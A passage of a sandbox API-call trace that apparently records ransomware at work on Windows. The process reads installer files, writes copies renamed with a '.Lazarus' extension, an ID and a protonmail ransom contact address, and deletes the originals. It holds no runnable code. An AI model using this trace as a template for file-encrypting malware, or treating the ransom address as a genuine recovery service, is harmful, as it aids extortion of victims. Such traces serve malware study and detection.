lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.626] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.626] GetLastError () returned 0x0 [0065.626] SetLastError (dwErrCode=0x0) [0065.627] GetLastError () returned 0x0 [0065.627] SetLastError (dwErrCode=0x0) [0065.627] GetLastError () returned 0x0 [0065.627] SetLastError (dwErrCode=0x0) [0065.627] GetLastError () returned 0x0 [0065.627] SetLastError (dwErrCode=0x0) [0065.627] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.627] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.627] GetLastError () returned 0x0 [0065.627] SetLastError (dwErrCode=0x0) [0065.627] GetLastError () returned 0x0 [0065.627] SetLastError (dwErrCode=0x0) [0065.628] GetLastError () returned 0x0 [0065.628] SetLastError (dwErrCode=0x0) [0065.628] GetLastError () returned 0x0 [0065.628] SetLastError (dwErrCode=0x0) [0065.628] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x10c, lpOverlapped=0x0) returned 1 [0065.628] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0065.628] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.628] GetLastError () returned 0x0 [0065.628] SetLastError (dwErrCode=0x0) [0065.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc) returned 0x7d4c8 [0065.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0065.628] GetLastError () returned 0x0 [0065.628] SetLastError (dwErrCode=0x0) [0065.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0065.629] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327ef70*=0x110, lpOverlapped=0x0) returned 1 [0065.629] GetLastError () returned 0x0 [0065.629] SetLastError (dwErrCode=0x0) [0065.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0065.629] GetLastError () returned 0x0 [0065.629] SetLastError (dwErrCode=0x0) [0065.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0065.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0065.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0065.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0065.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0065.629] CloseHandle (hObject=0x420) returned 1 [0065.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e650 | out: hHeap=0x20000) returned 1 [0065.632] CloseHandle (hObject=0x428) returned 1 [0065.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0065.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0065.632] AreFileApisANSI () returned 1 [0065.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0065.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x716f0 [0065.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 45 [0065.805] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.806] GetFileType (hFile=0x428) returned 0x1 [0065.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0065.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d648 [0065.806] GetLastError () returned 0xb7 [0065.806] SetLastError (dwErrCode=0xb7) [0065.806] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0065.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d648 | out: hHeap=0x20000) returned 1 [0065.807] CloseHandle (hObject=0x428) returned 1 [0065.808] AreFileApisANSI () returned 1 [0065.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0065.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0065.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 45 [0065.808] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml")) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0065.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.809] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0065.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0065.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0065.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0065.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0065.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0065.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0065.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0065.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0065.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0065.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0065.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0065.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0065.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0065.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0065.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0065.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0065.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0065.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0065.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0065.810] AreFileApisANSI () returned 1 [0065.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0065.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0065.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0065.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0065.810] AreFileApisANSI () returned 1 [0065.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0065.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a98 [0065.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 46 [0065.811] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.811] GetFileType (hFile=0x428) returned 0x1 [0065.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0065.811] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0065.811] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0065.811] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0065.811] CloseHandle (hObject=0x428) returned 1 [0065.811] AreFileApisANSI () returned 1 [0065.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0065.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0065.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 46 [0065.812] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.812] GetFileType (hFile=0x428) returned 0x1 [0065.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0065.812] CloseHandle (hObject=0x428) returned 1 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0065.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0065.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0065.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0065.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0065.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0065.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0065.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0065.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0065.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0065.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0065.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0065.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0065.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0065.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0065.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0065.813] AreFileApisANSI () returned 1 [0065.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0065.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 46 [0065.813] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58)) returned 1 [0065.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0065.813] AreFileApisANSI () returned 1 [0065.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0065.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0065.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0065.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0065.813] GetLastError () returned 0x0 [0065.813] SetLastError (dwErrCode=0x0) [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dea8 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0065.813] GetLastError () returned 0x0 [0065.813] SetLastError (dwErrCode=0x0) [0065.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0065.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71ca0 [0065.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0065.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0065.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0065.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0065.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0065.814] AreFileApisANSI () returned 1 [0065.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0065.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0065.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0065.814] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.814] GetFileType (hFile=0x428) returned 0x1 [0065.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0065.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0065.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0065.815] AreFileApisANSI () returned 1 [0065.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0065.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0065.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 46 [0065.815] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0065.815] GetFileType (hFile=0x420) returned 0x1 [0065.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0065.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0065.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0065.815] GetLastError () returned 0x0 [0065.815] SetLastError 